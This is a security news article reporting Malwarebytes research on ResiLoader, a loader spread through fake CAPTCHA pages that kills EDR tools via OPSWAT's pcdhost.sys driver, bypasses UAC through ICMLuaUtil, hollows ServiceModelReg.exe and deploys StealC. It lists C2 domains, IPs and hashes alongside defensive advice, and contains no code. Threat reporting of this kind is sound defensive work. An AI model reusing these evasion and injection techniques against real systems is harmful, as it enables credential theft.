PROBABLYPWNED
MalwareJuly 3, 20263 min read

ResiLoader Kills 140+ Security Tools Before Deploying StealC

Malwarebytes documents a new loader that abuses a legitimate driver to terminate EDR processes, then uses process hollowing to inject the StealC infostealer through fake Google and Cloudflare verification pages.

James Rivera

A new .NET NativeAOT loader called ResiLoader drops a legitimate driver, uses it to terminate more than 140 antivirus and EDR processes, then injects the StealC infostealer through process hollowing—all triggered by victims who thought they were completing a CAPTCHA.

Malwarebytes researcher Gabriele Orini documented the campaign, which has been running since late 2025 using fake Google reCAPTCHA screens, spoofed Cloudflare "Verify you're human" pages, bogus Google Meet audio-fix notices, and even a fake QR code generator. All roads lead to the same lure: copy this PowerShell command and paste it into your terminal.

The Infection Chain

The delivery mechanism follows the ClickFix pattern we've covered extensively—social engineering users into executing commands they don't understand. Victims encounter what appears to be a verification prompt, complete with familiar Google or Cloudflare branding. The "fix" involves copying a PowerShell snippet that downloads and executes the payload.

In one infection chain Malwarebytes traced, the attack begins with a trojanized version of the legitimate Franz messaging application. The compromised installer downloads ResiLoader, which then orchestrates a multi-stage compromise.

How ResiLoader Disables Security

ResiLoader's first priority is blinding defenders. It drops pcdhost.sys, a driver from OPSWAT's AppRemover tool—legitimate software used for uninstalling security products during migrations. The driver operates at kernel level, giving it authority to terminate processes that user-mode malware can't touch.

ResiLoader feeds more than 140 process names to the driver, including:

  • Major antivirus engines (Windows Defender, Norton, Kaspersky, etc.)
  • EDR agents (CrowdStrike, SentinelOne, Carbon Black)
  • Forensic and analysis tools

Once security software is disabled, ResiLoader executes a UAC bypass through the ICMLuaUtil COM interface, achieving elevated privileges without triggering the familiar Windows consent prompt. It establishes persistence via a Run registry key disguised as "Google Update"—a name that blends into legitimate software entries.

Process Hollowing and StealC Deployment

With security tools terminated and persistence established, ResiLoader performs process hollowing on ServiceModelReg.exe, a legitimate Windows binary. The technique creates a suspended process, replaces its memory contents with malicious code, then resumes execution. To monitoring tools that survived the initial purge, it appears that a Microsoft-signed executable is running normally.

The injected payload is StealC, a capable infostealer that harvests browser credentials, cryptocurrency wallets, session cookies, and authentication tokens.

Multiple Malware Families

StealC isn't the only payload distributed through this infrastructure. Malwarebytes identified seven distinct malware families delivered via the same fake verification campaign:

  • HijackLoader
  • StealC
  • Remus Stealer
  • Amatera Stealer
  • CastleLoader
  • NetSupport (RAT)
  • A Rust-based stealer

The shared infrastructure includes Cloudflare R2 buckets for payload hosting, expired domains that attackers repurchased, and compromised legitimate websites used as redirect points.

Indicators of Compromise

Command & Control:

  • completstep[.]com
  • popularcard[.]shop
  • xzz[.]proxygrid[.]cc

Payload distribution IPs:

  • 151.240.151.126
  • 85.239.149.16
  • 93.152.224.29

File hashes:

  • ResiLoader DLL: 72907d0ca3258365838626f6a8d993a6
  • StealC: 0234E3188F2883A438B3F2BEAB7A78B2

Defensive Recommendations

  1. Train users on verification scams - Google, Cloudflare, and Microsoft never ask users to paste PowerShell commands
  2. Block PowerShell command execution from browser contexts - Application control policies can prevent this entire attack vector
  3. Monitor for suspicious driver loads - Kernel drivers appearing outside software installations warrant investigation
  4. Detect process hollowing - EDR tools should flag process memory that doesn't match its on-disk image
  5. Restrict Run key modifications - Unauthorized persistence entries indicate compromise

The abuse of legitimate drivers to disable security tools represents an escalation in attacker sophistication. AppRemover exists for IT administrators—attackers weaponized it for the exact opposite purpose it was designed for. This category of living-off-the-land binary (LOLBIN) abuse continues expanding as threat actors mine enterprise tooling for exploitation opportunities.

Related Articles